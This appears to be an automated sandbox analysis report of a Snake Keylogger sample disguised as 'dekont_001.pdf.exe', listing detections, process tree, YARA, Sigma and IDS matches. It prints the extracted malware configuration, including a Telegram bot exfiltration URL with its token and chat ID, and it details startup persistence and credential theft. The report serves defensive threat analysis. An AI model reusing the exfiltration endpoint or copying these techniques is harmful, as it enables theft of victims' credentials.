Edit tour

Windows Analysis Report
dekont_001.pdf.exe

Overview

General Information

Sample name:	dekont_001.pdf.exe
Analysis ID:	1542398
MD5:	e8988ad104148396f3bbc969c3e84a94
SHA1:	b2f862133633e4dd69debb0d12c926c7cfbfa29f
SHA256:	e83231fa6c8d4df75581b44faa0180bc822f28168e12ed7590ba8c06a879a55e
Tags:	exe
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Suspicious Double Extension File Execution

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

dekont_001.pdf.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\dekont_001.pdf.exe" MD5: E8988AD104148396F3BBC969C3E84A94)

InstallUtil.exe (PID: 732 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 6048 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Id.exe (PID: 2188 cmdline: "C:\Users\user\AppData\Roaming\Id.exe" MD5: E8988AD104148396F3BBC969C3E84A94)

InstallUtil.exe (PID: 4192 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7936689263:AAFVbTtCpguyJIaEvOdJBx9Oj9n157mQOMA/sendMessage?chat_id=6008123474", "Token": "7936689263:AAFVbTtCpguyJIaEvOdJBx9Oj9n157mQOMA", "Chat_id": "6008123474", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15ff8:$a1: get_encryptedPassword 0x162e4:$a2: get_encryptedUsername 0x15e04:$a3: get_timePasswordChanged 0x15eff:$a4: get_passwordField 0x1600e:$a5: set_encryptedPassword 0x17648:$a7: get_logins 0x175ab:$a10: KeyLoggerEventArgs 0x17216:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1aff8:$x1: $%SMTPDV$ 0x199dc:$x2: $#TheHashHere%& 0x1afa0:$x3: %FTPDV$ 0x1997c:$x4: $%TelegramDv$ 0x17216:$x5: KeyLoggerEventArgs 0x175ab:$x5: KeyLoggerEventArgs 0x1afc4:$m2: Clipboard Logs ID 0x1b202:$m2: Screenshot Logs ID 0x1b312:$m2: keystroke Logs ID 0x1b5ec:$m3: SnakePW 0x1b1da:$m4: \SnakeKeylogger\
00000007.00000002.2933316783.000000000332D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1761092855.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19ad0:$x1: $%SMTPDV$ 0x19a78:$x3: %FTPDV$ 0x19a9c:$m2: Clipboard Logs ID 0x19cda:$m2: Screenshot Logs ID 0x19dea:$m2: keystroke Logs ID 0x1a0c4:$m3: SnakePW 0x19cb2:$m4: \SnakeKeylogger\
00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a74:$x1: $%SMTPDV$ 0x19a1c:$x3: %FTPDV$ 0x19a40:$m2: Clipboard Logs ID 0x19c7e:$m2: Screenshot Logs ID 0x19d8e:$m2: keystroke Logs ID 0x1a068:$m3: SnakePW 0x19c56:$m4: \SnakeKeylogger\
00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14960:$a1: get_encryptedPassword 0x14c4c:$a2: get_encryptedUsername 0x1476c:$a3: get_timePasswordChanged 0x14867:$a4: get_passwordField 0x14976:$a5: set_encryptedPassword 0x15fb0:$a7: get_logins 0x15f13:$a10: KeyLoggerEventArgs 0x15b7e:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19960:$x1: $%SMTPDV$ 0x18344:$x2: $#TheHashHere%& 0x19908:$x3: %FTPDV$ 0x182e4:$x4: $%TelegramDv$ 0x15b7e:$x5: KeyLoggerEventArgs 0x15f13:$x5: KeyLoggerEventArgs 0x1992c:$m2: Clipboard Logs ID 0x19b6a:$m2: Screenshot Logs ID 0x19c7a:$m2: keystroke Logs ID 0x19f54:$m3: SnakePW 0x19b42:$m4: \SnakeKeylogger\
00000000.00000002.1772224991.0000000006C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.2934160902.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x148a8:$a1: get_encryptedPassword 0x14b94:$a2: get_encryptedUsername 0x146b4:$a3: get_timePasswordChanged 0x147af:$a4: get_passwordField 0x148be:$a5: set_encryptedPassword 0x15ef8:$a7: get_logins 0x15e5b:$a10: KeyLoggerEventArgs 0x15ac6:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x198a8:$x1: $%SMTPDV$ 0x1828c:$x2: $#TheHashHere%& 0x19850:$x3: %FTPDV$ 0x1822c:$x4: $%TelegramDv$ 0x15ac6:$x5: KeyLoggerEventArgs 0x15e5b:$x5: KeyLoggerEventArgs 0x19874:$m2: Clipboard Logs ID 0x19ab2:$m2: Screenshot Logs ID 0x19bc2:$m2: keystroke Logs ID 0x19e9c:$m3: SnakePW 0x19a8a:$m4: \SnakeKeylogger\
00000004.00000002.1927771292.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.2933316783.0000000003161000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a00:$a1: get_encryptedPassword 0x14cec:$a2: get_encryptedUsername 0x1480c:$a3: get_timePasswordChanged 0x14907:$a4: get_passwordField 0x14a16:$a5: set_encryptedPassword 0x16050:$a7: get_logins 0x15fb3:$a10: KeyLoggerEventArgs 0x15c1e:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a00:$x1: $%SMTPDV$ 0x183e4:$x2: $#TheHashHere%& 0x199a8:$x3: %FTPDV$ 0x18384:$x4: $%TelegramDv$ 0x15c1e:$x5: KeyLoggerEventArgs 0x15fb3:$x5: KeyLoggerEventArgs 0x199cc:$m2: Clipboard Logs ID 0x19c0a:$m2: Screenshot Logs ID 0x19d1a:$m2: keystroke Logs ID 0x19ff4:$m3: SnakePW 0x19be2:$m4: \SnakeKeylogger\
00000001.00000002.2934160902.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 6968	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 6968	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 6968	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 6968	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: dekont_001.pdf.exe PID: 6968	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x227c:$a1: get_encryptedPassword 0xe54a5:$a1: get_encryptedPassword 0x255e:$a2: get_encryptedUsername 0xe5787:$a2: get_encryptedUsername 0x2092:$a3: get_timePasswordChanged 0xe52bb:$a3: get_timePasswordChanged 0x218d:$a4: get_passwordField 0xe53b6:$a4: get_passwordField 0x2292:$a5: set_encryptedPassword 0xe54bb:$a5: set_encryptedPassword 0x4576:$a7: get_logins 0xe779f:$a7: get_logins 0x44d9:$a10: KeyLoggerEventArgs 0xe7702:$a10: KeyLoggerEventArgs 0x4144:$a11: KeyLoggerEventArgsEventHandler 0xe736d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: dekont_001.pdf.exe PID: 6968	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x4144:$x5: KeyLoggerEventArgs 0x44d9:$x5: KeyLoggerEventArgs 0x4c9f:$x5: KeyLoggerEventArgs 0x5000:$x5: KeyLoggerEventArgs 0xe736d:$x5: KeyLoggerEventArgs 0xe7702:$x5: KeyLoggerEventArgs 0xe7ec8:$x5: KeyLoggerEventArgs 0xe8229:$x5: KeyLoggerEventArgs 0x68f8:$m2: Clipboard Logs ID 0x69fe:$m2: Screenshot Logs ID 0x6a54:$m2: keystroke Logs ID 0x8e9bd:$m2: Clipboard Logs ID 0x8eac3:$m2: Screenshot Logs ID 0x8eb19:$m2: keystroke Logs ID 0xe9b21:$m2: Clipboard Logs ID 0xe9c27:$m2: Screenshot Logs ID 0xe9c7d:$m2: keystroke Logs ID 0x6b89:$m3: SnakePW 0x8ec4e:$m3: SnakePW 0xe9db2:$m3: SnakePW 0x69ea:$m4: \SnakeKeylogger\
Process Memory Space: InstallUtil.exe PID: 732	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 732	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: InstallUtil.exe PID: 732	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4a52f:$a1: get_encryptedPassword 0x4a811:$a2: get_encryptedUsername 0x4a345:$a3: get_timePasswordChanged 0x4a440:$a4: get_passwordField 0x4a545:$a5: set_encryptedPassword 0x4c829:$a7: get_logins 0x4c78c:$a10: KeyLoggerEventArgs 0x4c3f7:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 732	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x4c3f7:$x5: KeyLoggerEventArgs 0x4c78c:$x5: KeyLoggerEventArgs 0x4cf52:$x5: KeyLoggerEventArgs 0x4d2b3:$x5: KeyLoggerEventArgs 0x4ebab:$m2: Clipboard Logs ID 0x4ecb1:$m2: Screenshot Logs ID 0x4ed07:$m2: keystroke Logs ID 0x4ee3c:$m3: SnakePW 0x4ec9d:$m4: \SnakeKeylogger\
Process Memory Space: Id.exe PID: 2188	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Id.exe PID: 2188	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Id.exe PID: 2188	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Id.exe PID: 2188	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Id.exe PID: 2188	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x767fe:$a1: get_encryptedPassword 0x76ae0:$a2: get_encryptedUsername 0x76614:$a3: get_timePasswordChanged 0x7670f:$a4: get_passwordField 0x76814:$a5: set_encryptedPassword 0x78af8:$a7: get_logins 0x78a5b:$a10: KeyLoggerEventArgs 0x786c6:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Id.exe PID: 2188	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x786c6:$x5: KeyLoggerEventArgs 0x78a5b:$x5: KeyLoggerEventArgs 0x79221:$x5: KeyLoggerEventArgs 0x79582:$x5: KeyLoggerEventArgs 0x46d0c:$m2: Clipboard Logs ID 0x46e12:$m2: Screenshot Logs ID 0x46e68:$m2: keystroke Logs ID 0x7ae7a:$m2: Clipboard Logs ID 0x7af80:$m2: Screenshot Logs ID 0x7afd6:$m2: keystroke Logs ID 0x46f9d:$m3: SnakePW 0x7b10b:$m3: SnakePW 0x46dfe:$m4: \SnakeKeylogger\ 0x7af6c:$m4: \SnakeKeylogger\
Process Memory Space: InstallUtil.exe PID: 4192	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 4192	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 42 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.dekont_001.pdf.exe.6c30000.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14aa8:$a1: get_encryptedPassword 0x14d94:$a2: get_encryptedUsername 0x148b4:$a3: get_timePasswordChanged 0x149af:$a4: get_passwordField 0x14abe:$a5: set_encryptedPassword 0x160f8:$a7: get_logins 0x1605b:$a10: KeyLoggerEventArgs 0x15cc6:$a11: KeyLoggerEventArgsEventHandler
0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c45e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b690:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bac3:$a4: \Orbitum\User Data\Default\Login Data 0x1cb02:$a5: \Kometa\User Data\Default\Login Data
0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15675:$s1: UnHook 0x1567c:$s2: SetHook 0x15684:$s3: CallNextHook 0x15691:$s4: _hook
0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19aa8:$x1: $%SMTPDV$ 0x1848c:$x2: $#TheHashHere%& 0x19a50:$x3: %FTPDV$ 0x1842c:$x4: $%TelegramDv$ 0x15cc6:$x5: KeyLoggerEventArgs 0x1605b:$x5: KeyLoggerEventArgs 0x19a74:$m2: Clipboard Logs ID 0x19cb2:$m2: Screenshot Logs ID 0x19dc2:$m2: keystroke Logs ID 0x1a09c:$m3: SnakePW 0x19c8a:$m4: \SnakeKeylogger\
0.2.dekont_001.pdf.exe.3e49550.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dekont_001.pdf.exe.3e49550.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.dekont_001.pdf.exe.3e49550.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12ca8:$a1: get_encryptedPassword 0x12f94:$a2: get_encryptedUsername 0x12ab4:$a3: get_timePasswordChanged 0x12baf:$a4: get_passwordField 0x12cbe:$a5: set_encryptedPassword 0x142f8:$a7: get_logins 0x1425b:$a10: KeyLoggerEventArgs 0x13ec6:$a11: KeyLoggerEventArgsEventHandler
0.2.dekont_001.pdf.exe.3e49550.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a65e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19890:$a3: \Google\Chrome\User Data\Default\Login Data 0x19cc3:$a4: \Orbitum\User Data\Default\Login Data 0x1ad02:$a5: \Kometa\User Data\Default\Login Data
0.2.dekont_001.pdf.exe.3e49550.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13875:$s1: UnHook 0x1387c:$s2: SetHook 0x13884:$s3: CallNextHook 0x13891:$s4: _hook
0.2.dekont_001.pdf.exe.3e49550.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17ca8:$x1: $%SMTPDV$ 0x1668c:$x2: $#TheHashHere%& 0x17c50:$x3: %FTPDV$ 0x1662c:$x4: $%TelegramDv$ 0x13ec6:$x5: KeyLoggerEventArgs 0x1425b:$x5: KeyLoggerEventArgs 0x17c74:$m2: Clipboard Logs ID 0x17eb2:$m2: Screenshot Logs ID 0x17fc2:$m2: keystroke Logs ID 0x1829c:$m3: SnakePW 0x17e8a:$m4: \SnakeKeylogger\
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\dekont_001.pdf.exe", CommandLine: "C:\Users\user\Desktop\dekont_001.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\dekont_001.pdf.exe, NewProcessName: C:\Users\user\Desktop\dekont_001.pdf.exe, OriginalFileName: C:\Users\user\Desktop\dekont_001.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\dekont_001.pdf.exe", ProcessId: 6968, ProcessName: dekont_001.pdf.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , ProcessId: 6048, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , ProcessId: 6048, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\dekont_001.pdf.exe, ProcessId: 6968, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T21:27:08.634344+0200	2803305	3	Unknown Traffic	192.168.2.4	49733	188.114.97.3	443	TCP
2024-10-25T21:27:13.046368+0200	2803305	3	Unknown Traffic	192.168.2.4	49739	188.114.97.3	443	TCP
2024-10-25T21:27:14.512086+0200	2803305	3	Unknown Traffic	192.168.2.4	49741	188.114.97.3	443	TCP
2024-10-25T21:27:25.172792+0200	2803305	3	Unknown Traffic	192.168.2.4	49755	188.114.97.3	443	TCP
2024-10-25T21:27:30.891726+0200	2803305	3	Unknown Traffic	192.168.2.4	49763	188.114.97.3	443	TCP
2024-10-25T21:27:33.762417+0200	2803305	3	Unknown Traffic	192.168.2.4	49767	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T21:27:06.732147+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	158.101.44.242	80	TCP
2024-10-25T21:27:07.872747+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	158.101.44.242	80	TCP
2024-10-25T21:27:09.388391+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	158.101.44.242	80	TCP
2024-10-25T21:27:10.872949+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	158.101.44.242	80	TCP
2024-10-25T21:27:12.279055+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	158.101.44.242	80	TCP
2024-10-25T21:27:23.169700+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49753	158.101.44.242	80	TCP
2024-10-25T21:27:24.450911+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49753	158.101.44.242	80	TCP
2024-10-25T21:27:25.888409+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49756	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: dekont_001.pdf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Id.exe

Avira: detection malicious, Label: HEUR/AGEN.1308518

Found malware configuration

Source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7936689263:AAFVbTtCpguyJIaEvOdJBx9Oj9n157mQOMA/sendMessage?chat_id=6008123474", "Token": "7936689263:AAFVbTtCpguyJIaEvOdJBx9Oj9n157mQOMA", "Chat_id": "6008123474", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Id.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: dekont_001.pdf.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Id.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: dekont_001.pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: dekont_001.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:49733 -> 188.114.97.3:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: dekont_001.pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

